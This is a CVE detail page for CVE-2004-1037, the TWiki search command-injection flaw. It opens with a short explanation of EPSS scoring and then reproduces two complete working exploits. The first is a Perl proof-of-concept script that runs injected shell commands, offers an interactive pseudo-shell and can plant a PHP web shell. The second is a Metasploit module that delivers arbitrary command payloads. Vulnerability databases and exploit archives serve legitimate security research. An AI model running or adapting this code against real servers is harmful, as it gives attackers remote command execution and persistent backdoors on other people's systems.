CVE-2004-1037 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/perl # "tweaky.pl" v. 1.0 beta 2 # # Proof of concept for TWiki vulnerability. Remote code execution # Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com> # # Madrid, 30.Sep.2004. require LWP::UserAgent; use Getopt::Long; ### Default config $host = ''; $path = '/cgi-bin/twiki/search/Main/'; $secure = 0; $get = 0; $post = 0; $phpshellpath=''; $createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"]. " 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\ $out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee '; $logfile = ''; # If empty, logging will be disabled $prompt = "tweaky\$ "; $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'; $proxy = ''; $proxy_user = ''; $proxy_pass = ''; $basic_auth_user = ''; $basic_auth_pass = ''; $timeout = 30; $debug = 0; $init_command = 'uname -a ; id'; $start_mark = 'AAAA'; $end_mark = 'BBBB'; $pre_string = 'nonexistantttt\' ; ('; $post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt'; $delim_start = '<b>'.$start_mark; $delim_end = $end_mark.'</b>'; print "Proof of concept for TWiki vulnerability. Remote code execution.\n"; print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n"; ### User-supplied config (read from the command-line) $parsing_ok = GetOptions ('host=s' => \$host, 'path=s' => \$path, 'secure' => \$secure, 'get' => \$get, 'post' => \$post, 'phpshellpath=s' => \$phpshellpath, 'logfile=s' => \$logfile, 'init_command=s' => \$init_command, 'useragent=s' => \$useragent, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'basic_auth_user=s' => \$basic_auth_user, 'basic_auth_pass=s' => \$basic_auth_pass, 'timeout=i' => \$timeout, 'debug' => \$debug, 'start_mark=s' => \$start_mark, 'end_mark=s' => \$end_mark); ### Some basic checks &banner unless ($parsing_ok); if ($get and $post) { print "Choose one only method! (GET or POST)\n\n"; &banner; } if (!($get or $post)) { # If not specified we prefer POST method $post = 1; } if (!$host) { print "You must specify a target hostname! (tip: --host <hostname>)\n\n" ; &banner; } $url = ($secure ? 'https' : 'http') . "://" . $host . $path; ### Checking for a vulnerable TWiki &run_it ($init_command, 'RS-Labs rlz!'); ### Execute selected payload if ($phpshellpath) { &create_phpshell; print "PHPShell created."; } else { &pseudoshell; } ### End exit(0); ### Create PHPShell sub create_phpshell { $createphpshell .= $phpshellpath; &run_it($createphpshell, 'yeah!'); } ### Pseudo-shell sub pseudoshell { open(LOGFILE, ">>$logfile") if $logfile; open(STDINPUT, '-'); print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n \n".$prompt.$init_command."\n"; &run_it ($init_command); print $prompt; while (<STDINPUT>) { chop; if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") { exit(1); } &run_it ($_) unless !$_; print "\n".$prompt; } close(STDINPUT); close(LOGFILE) if $logfile; } ### Print banner and die sub banner { print "Syntax: ./tweaky.pl --host=<host> [options]\n\n"; print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n"; print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n"; print "Secure HTTP (HTTPS): --secure\n"; print "Path to CGI: --path=$path\n"; print "Method: --get | --post\n"; print "Enable logging: --logfile=/path/to/a/file\n"; print "Create PHPShell: --phpshellpath=/path/to/phpshell\n"; exit(1); } ### Execute command via vulnerable CGI sub run_it { my ($command, $testing_vuln) = @_; my $req; my $ua = new LWP::UserAgent; $ua->agent($useragent); $ua->timeout($timeout); # Build CGI param and urlencode it my $search = $pre_string . $command . $post_string; $search =~ s/(\W)/"%" . unpack("H2", $1)/ge; # Case GET if ($get) { $req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search"); } # Case POST if ($post) { $req = new HTTP::Request POST => $url; $req->content_type('application/x-www-form-urlencoded'); $req->content("scope=text&order=modified&search=$search"); } # Proxy definition if ($proxy) { if ($secure) { # HTTPS request $ENV{HTTPS_PROXY} = $proxy; $ENV{HTTPS_PROXY_USERNAME} = $proxy_user; $ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass; } else { # HTTP request $ua->proxy(['http'] => $proxy); $req->proxy_authorization_basic($proxy_user, $proxy_pass); } } # Basic Authorization $req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user); # Launch request and parse results my $res = $ua->request($req); if ($res->is_success) { print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln); @content = split("\n", $res->content); my $empty_response = 1; foreach $_ (@content) { my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g); if ($debug) { print $_ . "\n"; } else { if ($match) { $empty_response = 0; print $match . "\n" unless ($testing_vuln); } } print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln); } if ($empty_response) { if ($testing_vuln) { die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL (remember it should point to Twiki's search page).\n"; } else { print "[Server issued an empty response. Perhaps you entered a wrong command?]\n"; } } } else { die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n"; } } # milw0rm.com [2004-11-20]

## # $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'TWiki Search Function Arbitrary Command Execution', 'Description' => %q{ This module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands. }, 'Author' => [ # Unknown - original discovery 'jduck' # metasploit version ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9671 $', 'References' => [ [ 'CVE', '2004-1037' ], [ 'OSVDB', '11714' ], [ 'BID', '11674' ], [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ] ], 'Privileged' => true, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => ' ', 'Space' => 1024, }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Oct 01 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]), ], self.class) end def check content = rand_text_alphanumeric(16+rand(16)) test_file = rand_text_alphanumeric(8+rand(8)) cmd_base = datastore['URI'] + '/view/Main/WebSearch?search=' test_url = datastore['URI'] + '/view/Main/' + test_file # first see if it already exists (it really shouldn't) res = send_request_raw({ 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) print_error("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end # try to create it print_status("Attempting to create #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) return Exploit::CheckCode::Safe end # try to run it, 500 code == successfully made it res = send_request_raw({ 'uri' => test_url }, 25) if (not res) or (not res.body.match(content)) return Exploit::CheckCode::Safe end # delete the tmp file print_status("Attempting to delete #{test_url} ...") search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'" res = send_request_raw({ 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) print_error("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable end def exploit search = rand_text_alphanumeric(1+rand(8)) search << "';" + payload.encoded + ";#\'" query_str = datastore['URI'] + '/view/Main/WebSearch' query_str << '?search=' query_str << Rex::Text.uri_encode(search) res = send_request_cgi({ 'method' => 'GET', 'uri' => query_str, }, 25) if (res and res.code == 200) print_status("Successfully sent exploit request") else raise RuntimeError, "Error sending exploit request" end handler end end